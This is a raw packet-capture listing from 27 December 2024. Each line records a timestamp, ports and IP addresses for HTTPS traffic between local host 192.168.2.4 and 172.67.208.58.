                                                                                                                                                                                            Dec 27, 2024 20:23:55.470144033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.470206976 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.470216036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.470227957 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.470257998 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.477168083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.477189064 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.477260113 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.477272034 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.477315903 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.617019892 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.617047071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.617192984 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.617228985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.617284060 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.623785973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.623810053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.623909950 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.623923063 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.623966932 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.631690979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.631742954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.631813049 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.631824970 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.631851912 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.631864071 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.639489889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.639511108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.639585018 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.639601946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.639653921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.646794081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.646814108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.646879911 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.646889925 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.646927118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.654819965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.654850006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.654905081 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.654918909 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.654931068 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.654958010 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.661600113 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.661619902 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.661684036 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.661695004 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.661737919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.669359922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.669382095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.669465065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.669480085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.669522047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.808677912 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.808701038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.808784008 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.808801889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.808841944 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.809524059 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.816514969 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.816562891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.816621065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.816627979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.816669941 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.823400021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.823421001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.823493004 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.823502064 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.823543072 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.831108093 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.831129074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.831204891 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.831213951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.831254005 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.838967085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.838985920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.839037895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.839047909 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.839075089 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.839092016 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.846410990 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.846431017 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.846508980 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.846518040 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.846564054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.854131937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.854152918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.854197979 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.854204893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.854235888 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.854249001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.861274958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.861295938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.861349106 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:55.861357927 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:55.861394882 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.000823975 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.000844955 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.000905037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.000931978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.000948906 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.000973940 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.007647038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.007671118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.007709026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.007718086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.007751942 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.007762909 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.015613079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.015645981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.015695095 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.015702963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.015746117 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.023319960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.023360968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.023410082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.023418903 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.023431063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.023458958 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.030597925 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.030620098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.030663967 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.030670881 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.030702114 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.030723095 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.038482904 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.038510084 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.038564920 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.038572073 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.038602114 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.038619041 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.045358896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.045382977 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.045440912 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.045454979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.045485973 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.045506954 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.053476095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.053500891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.053550005 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.053565025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.053596973 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.053617001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.129184008 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.192831993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.192858934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.192939043 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.192965031 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.193013906 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.199889898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.199914932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.199971914 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.199986935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.200038910 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.200038910 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.207556009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.207591057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.207637072 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.207653046 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.207681894 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.207700014 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.215325117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.215357065 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.215399981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.215409994 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.215432882 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.215457916 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.223630905 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.223661900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.223696947 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.223705053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.223720074 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.223745108 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.230540037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.230561018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.230593920 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.230602026 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.230632067 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.230658054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.237399101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.237421989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.237466097 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.237474918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.237502098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.237515926 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.245260000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.245311975 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.245381117 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.245398045 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.245440960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.385098934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.385126114 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.385173082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.385205984 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.385232925 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.385257959 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.393084049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.393106937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.393150091 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.393165112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.393191099 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.393208981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.398498058 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.400635958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.400660992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.400712013 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.400726080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.400754929 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.400779963 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.407535076 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.407557964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.407593012 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.407613039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.407638073 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.407679081 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.414997101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.415024042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.415061951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.415076017 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.415127993 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.415127993 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.422727108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.422748089 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.422785997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.422796011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.422808886 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.422827005 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.430782080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.430810928 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.430880070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.430896997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.430953026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.437582016 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.437606096 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.437660933 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.437671900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.437691927 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.437726021 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.498435974 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.577384949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.577414036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.577536106 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.577570915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.577625990 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.584903002 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.584927082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.585020065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.585042000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.585103035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.585103035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.591933966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.591969013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.592055082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.592089891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.592118979 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.592143059 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.599608898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.599632978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.599709034 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.599728107 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.599744081 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.599767923 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.606973886 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.606997013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.607062101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.607073069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.607106924 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.607121944 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.610191107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.614722013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.614743948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.614818096 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.614836931 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.614886045 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.622615099 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.622637033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.622705936 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.622716904 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.622759104 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.623166084 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.629545927 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.629574060 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.629630089 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.629640102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.629656076 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.629679918 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.637401104 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.768899918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.768965006 CET44349747172.67.208.58192.168.2.4
